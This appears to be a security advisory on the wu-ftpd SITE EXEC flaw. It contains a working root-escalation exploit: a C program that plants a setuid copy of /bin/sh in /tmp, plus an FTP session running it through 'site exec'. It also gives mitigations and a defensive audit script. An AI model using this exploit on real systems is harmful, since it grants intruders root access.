COMMAND

    wu.ftpd(8)

SYSTEMS AFFECTED

    Sites  running  wuarchive  ftpd  versions  prior to 2.3 or running
    "wrl" ftpd version ??

PROBLEM

    wu-ftpd before version 2.3 has a bug in the "SITE EXEC" command
    which allows people to run commands in the ftp server. If the
    directory /bin/ftp-exec exists *inside* the anonymous ftp chroot
    area, the attack is fairly weak - you can get a shell owned
    inside the ftp area. This is still a pretty nasty attack since
    there is a chance you could use it to upload trojans to the ftp
    server. However, if you have a /bin/ftp-exec directory in your
    real outside filesystem, a hacker can trivially get a root shell
    on your machine by telneting to the ftp port and issuing a SITE
    EXEC ../../../../bin/sh command! You issue this command as the
    first thing you do after telneting to the port, before any
    attempt to log in. Thus you still have the root privileges
    of the ftp daemon itself. Nasty.

    Compile program :

        #include <stdio.h>
        #include <stdlib.h>
        #include <unistd.h>

        int main(void)
        {
            seteuid (0);
            system ("cp /bin/sh /tmp/.sh");
            system ("chmod 6777 /tmp/.sh");
            return 0;
        }

    Log in to the system :

        220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready.
        Name (exploitablesys:root): goodaccount
        331 Password required for goodaccount.
        Password: (password)
        230 User goodaccount logged in.
        Remote system type is UNIX.
        Using binary mode to transfer files.

    See if system is exploitable :

        ftp> quote "site exec bash -c id"
        200-bash -c id
        200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
        200  (end of 'bash -c id')

    Exploit system :

        ftp> quote "site exec bash -c /yer/home/dir/ftpbug"
        200-bash -c /yer/home/dir/ftpbug
        200  (end of 'bash -c /yer/home/dir/ftpbug')
        ftp> quit
        221 Goodbye.

SOLUTION

    As an emergency measure remove the ftp-exec directory immediately,
    hack the source and remove the 'site exec' feature, add 'chmod no
    anonymous' and 'umask no anonymous' to your ftpaccess file to
    stop outsiders from uploading executables, then as soon as you
    possibly can, fetch the latest version of wuarchive's ftpd and
    upgrade to it.
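
    One way to check a host against the emergency measures above, as an
    added example that is not part of the original advisory. The
    function names, the severity labels and the three path arguments
    (system root, anonymous ftp home, ftpaccess location) are
    assumptions; the advisory gives only /bin/ftp-exec and the two
    ftpaccess lines.

```sh
#!/bin/sh
# Added audit example, not part of the original advisory.
# Assumption: the caller supplies the system root, the anonymous FTP
# home and the ftpaccess path, since the advisory names none of them.

# True if DIR/bin/ftp-exec exists as a directory.
has_ftp_exec_dir() {
    [ -d "$1/bin/ftp-exec" ]
}

# True if FILE has an active "<keyword> no <typelist>" line whose
# comma-separated typelist includes "anonymous". Commented-out lines
# and a missing file both count as "not denied".
ftpaccess_denies() {
    grep -Eq "^[[:space:]]*$2[[:space:]]+no[[:space:]]+([a-z]+,)*anonymous(,[a-z]+)*[[:space:]]*\$" "$1" 2>/dev/null
}

# Prints one line per finding; the exit status is the finding count.
audit_wuftpd() {
    sysroot=$1 ftphome=$2 ftpaccess=$3 findings=0
    if has_ftp_exec_dir "$sysroot"; then
        echo "CRITICAL: $sysroot/bin/ftp-exec exists in the real filesystem"
        findings=$((findings + 1))
    fi
    if has_ftp_exec_dir "$ftphome"; then
        echo "WARNING: $ftphome/bin/ftp-exec exists inside the ftp area"
        findings=$((findings + 1))
    fi
    for keyword in chmod umask; do
        if ! ftpaccess_denies "$ftpaccess" "$keyword"; then
            echo "WARNING: no '$keyword no anonymous' line in $ftpaccess"
            findings=$((findings + 1))
        fi
    done
    return "$findings"
}

# Usage: sh audit.sh SYSROOT FTPHOME FTPACCESS   (SYSROOT "" = live system)
if [ "$#" -eq 3 ]; then
    audit_wuftpd "$@"
fi
```

    An exit status of 0 means none of the conditions named in the
    advisory were found; it does not establish that the ftpd binary
    itself has been upgraded.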